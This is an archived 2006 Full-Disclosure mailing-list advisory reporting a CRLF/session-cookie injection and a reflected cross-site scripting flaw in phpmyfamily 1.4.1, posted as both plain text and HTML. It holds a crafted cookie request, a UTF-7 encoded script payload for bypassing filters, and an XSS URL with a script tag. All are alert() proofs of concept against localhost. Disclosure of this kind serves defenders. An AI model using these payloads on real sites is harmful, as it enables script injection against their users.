[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection &
From:       h4cky0u <h4cky0u.org () gmail ! com>
Date:       2006-03-27 8:58:09
Message-ID: 68cbfab10603270046x5ab00245gfc95f5ac3100aedf () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


------------------------------------------------------
      HYSA-2006-007 h4cky0u.org Advisory 016
------------------------------------------------------
Date - Mon March 27 2006


TITLE:
======

phpmyfamily v1.4.1 CRLF injection & XSS


SEVERITY:
=========

Medium


SOFTWARE:
=========

phpmyfamily v1.4.1

http://www.phpmyfamily.net/


INFO:
=====

phpmyfamily is a dynamic genealogy website builder which allows
geographically dispersed family members to maintain a central database of
research which is readily accessable and editable.


DESCRIPTION:
============

--== CRLF Injection ==--

GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close

Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z,

0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88

You can try to encode <script>alert('matrix_killer');</script> in Utf-7 like
this:

+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer');
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-

This way you can bypass the protection, but I'm not sure that it will work.
For me it didn't but I'm still a beginner with

the crlf attacks.

--== XSS ==--

http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij



VENDOR STATUS:
==============

Vendor was contacted but no response received till date.


CREDITS:
========

This vulnerability was discovered and researched by matrix_killer of h4cky0u
Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us
!!!


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt

--
http://www.h4cky0u.org
(In)Security at its best...


[Attachment #5 (text/html)]

<p>------------------------------------------------------<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \
HYSA-2006-007 <a href="http://h4cky0u.org">h4cky0u.org</a> Advisory \
016<br>------------------------------------------------------<br>Date - Mon March 27 \
2006 </p>
<p><br>TITLE:<br>======</p>
<p>phpmyfamily v1.4.1 CRLF injection &amp; XSS</p>
<p><br>SEVERITY:<br>=========</p>
<p>Medium</p>
<p><br>SOFTWARE:<br>=========</p>
<p>phpmyfamily v1.4.1</p>
<p><a href="http://www.phpmyfamily.net/">http://www.phpmyfamily.net/</a></p>
<p><br>INFO:<br>=====</p>
<p>phpmyfamily is a dynamic genealogy website builder which allows geographically \
dispersed family members to maintain a central database of research which is readily \
accessable and editable.</p> <p><br>DESCRIPTION:<br>============</p>
<p>--== CRLF Injection ==--</p>
<p>GET /phpmyfamily/ HTTP/1.0<br>Accept: */*<br>User-Agent: Mozilla/4.0 (compatible; \
MSIE 6.0)<br>Host: <a href="http://127.0.0.1:80">127.0.0.1:80</a><br>Cookie: \
PHPSESSID=-4-2-=674sdasaf_<br>Connection: Close</p> <p>Warning: session_start() \
[function.session-start]: The session id contains illegal characters, valid \
characters are a-z, A-Z, </p> <p>0-9 and '-,' in \
C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88</p> <p>You can try to encode \
&lt;script&gt;alert('matrix_killer');&lt;/script&gt; in Utf-7 like this:</p> \
<p>+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); \
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- </p> <p>This way you can bypass the \
protection, but I'm not sure that it will work. For me it didn't but I'm still a \
beginner with </p> <p>the crlf attacks.</p>
<p>--== XSS ==--</p>
<p><a href="http://127.0.0.1/phpmyfamily/track.php?person=00001&amp;name='&gt;&lt;scri \
pt&gt;alert();&lt;/script&gt;&amp;email=1&amp;action=sub&amp;submit=Wy%B6lij">http://1 \
27.0.0.1/phpmyfamily/track.php?person=00001&amp;name='&gt;&lt;script&gt;alert();&lt;/script&gt;&amp;email=1&amp;action=sub&amp;submit=Wy%B6lij
 </a></p>
<p><br>VENDOR STATUS:<br>==============</p>
<p>Vendor was contacted but no response received till date.</p>
<p><br>CREDITS:<br>========</p>
<p>This vulnerability was discovered and researched by matrix_killer of h4cky0u \
Security Forums.</p> <p>mail : matrix_k at <a href="http://abv.bg">abv.bg</a></p>
<p>web : <a href="http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>
<p><br>Co-Researcher:</p>
<p>h4cky0u of h4cky0u Security Forums.</p>
<p>mail : h4cky0u at <a href="http://gmail.com">gmail.com</a></p>
<p>web : <a href="http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>
<p>Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!</p>
<p><br>ORIGINAL ADVISORY:<br>==================</p>
<p><a href="http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt">http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt</a></p><br>-- \
<br><a href="http://www.h4cky0u.org">http://www.h4cky0u.org</a><br> (In)Security at \
its best... 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic